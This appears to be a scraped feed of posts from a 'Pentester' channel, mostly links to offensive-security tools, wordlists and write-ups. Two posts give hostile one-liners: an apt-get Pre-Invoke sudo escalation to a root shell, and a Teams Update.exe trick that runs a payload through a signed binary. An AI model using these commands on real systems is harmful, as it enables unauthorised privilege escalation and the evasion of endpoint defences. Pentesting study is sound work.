Pentester

Linux for Pentester: APT Privilege Escalation

Exploiting Sudo rights: Method -I

sudo apt-get update -o APT::Update::Pre-Invoke::= /bin/bash https://t.co/iv7saeYsr6

Twitter

김진욱

Linux for Pentester: APT Privilege Escalation Exploiting Sudo rights: Method -I sudo apt-get update -o APT::Update::Pre-Invoke::= /bin/bash

59 views13:23

Pentester

GitHub - sdcampbell/Internal-Pentest-Playbook: Internal Network Penetration Test Playbook
https://github.com/sdcampbell/Internal-Pentest-Playbook

GitHub

GitHub - sdcampbell/Internal-Pentest-Playbook: Internal Network Penetration Test Playbook

Internal Network Penetration Test Playbook. Contribute to sdcampbell/Internal-Pentest-Playbook development by creating an account on GitHub.

55 views05:25

Pentester

GitHub - emadshanab/WordLists-20111129: A lists of words based on common web directory and file names lists of words based on common web directory and file names. These wordlists are for Web security testing purpose.
https://github.com/emadshanab/WordLists-20111129

GitHub

GitHub - emadshanab/WordLists-20111129: A lists of words based on common web directory and file names lists of words based on common…

A lists of words based on common web directory and file names lists of words based on common web directory and file names. These wordlists are for Web security testing purpose. - emadshanab/WordLis...

54 views05:25

Pentester

GitHub - dukebarman/ghidra-builder: Docker image for building ghidra RE framework from source
https://github.com/dukebarman/ghidra-builder

GitHub

GitHub - dukebarman/ghidra-builder: Docker image for building ghidra RE framework from source

Docker image for building ghidra RE framework from source - dukebarman/ghidra-builder

52 views11:39

Pentester

The Return of the WIZard: RCE in Exim - GlitchWitch.IO
https://glitchwitch.io/blog/2019-06/exploiting-cve-2019-10149/

51 views15:57

Pentester

How to Upgrade Your XSS Bug from Medium to Critical
https://medium.com/@hakluke/upgrade-xss-from-medium-to-critical-cb96597b6cc4

Medium

How to Upgrade Your XSS Bugs from Medium to Critical

Some ways to effectively leverage XSS vulnerabilities to increase severity, and some canned payloads to hack popular frameworks!

66 views03:54

Pentester

GitHub - BishopFox/sliver: Implant framework
https://github.com/BishopFox/sliver

GitHub

GitHub - BishopFox/sliver: Adversary Emulation Framework

Adversary Emulation Framework. Contribute to BishopFox/sliver development by creating an account on GitHub.

67 views03:56

Pentester

DHCP Penetration Testing
https://www.hackingarticles.in/dhcp-penetration-testing/

Hacking Articles

DHCP Penetration Testing

DHCP stands for Dynamic Host Configuration Protocol and a DHCP server dynamically assigns an IP address to enable hosts (DHCP Clients). Basically, the DHCP server reduces the

62 views04:44

Pentester

Magic Unicorn 3.8.1 released.

Adds new method for platform detection, obfuscation, and a fix for python2 raw_input when using AMSI bypass.

https://t.co/YeXwYojd5l

GitHub

trustedsec/unicorn

Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique...

56 views08:57

Pentester

Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\

Then

%userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args"

Trusted signed binary will run the payload for you 😊

78 views09:11

Pentester

https://github.com/olafhartong/sysmon-cheatsheet

GitHub

GitHub - olafhartong/sysmon-cheatsheet: All sysmon event types and their fields explained

All sysmon event types and their fields explained. Contribute to olafhartong/sysmon-cheatsheet development by creating an account on GitHub.

67 views09:12

Pentester

Android-Reports-and-Resources/README.md at master · B3nac/Android-Reports-and-Resources · GitHub
https://github.com/B3nac/Android-Reports-and-Resources/blob/master/README.md

GitHub

Android-Reports-and-Resources/README.md at master · B3nac/Android-Reports-and-Resources

A big list of Android Hackerone disclosed reports and other resources. - B3nac/Android-Reports-and-Resources

50 views09:28

Pentester

Finding and Testing MisConfigured S3 Buckets ! - Rohan Chavan - Medium
https://medium.com/@rohanchavan/finding-and-testing-misconfigured-s3-buckets-d77992c4b5cd

Medium

Finding and Testing MisConfigured S3 Buckets.

An guide to find misconfigured s3 buckets for #BugBounty.

48 views18:15

Pentester

GitHub - securityidiots/CollabOzark: CollabOzark is a simple tool which helps the researchers track SSRF, RCE, Blind XSS, XXE, External Resource Access payloads triggers.
https://github.com/securityidiots/CollabOzark

GitHub

GitHub - securityidiots/CollabOzark: CollabOzark is a simple tool which helps the researchers track SSRF, RCE, Blind XSS, XXE,…

CollabOzark is a simple tool which helps the researchers track SSRF, RCE, Blind XSS, XXE, External Resource Access payloads triggers. - GitHub - securityidiots/CollabOzark: CollabOzark is a simple ...

57 views18:17

Pentester

GitHub - RedTeamOperations/PivotSuite: Network Pivoting Toolkit
https://github.com/RedTeamOperations/PivotSuite

GitHub

GitHub - RedTeamOperations/PivotSuite: Network Pivoting Toolkit

Network Pivoting Toolkit. Contribute to RedTeamOperations/PivotSuite development by creating an account on GitHub.

51 views18:18

Pentester

amass — Automated Attack Surface Mapping | Daniel Miessler
https://danielmiessler.com/study/amass/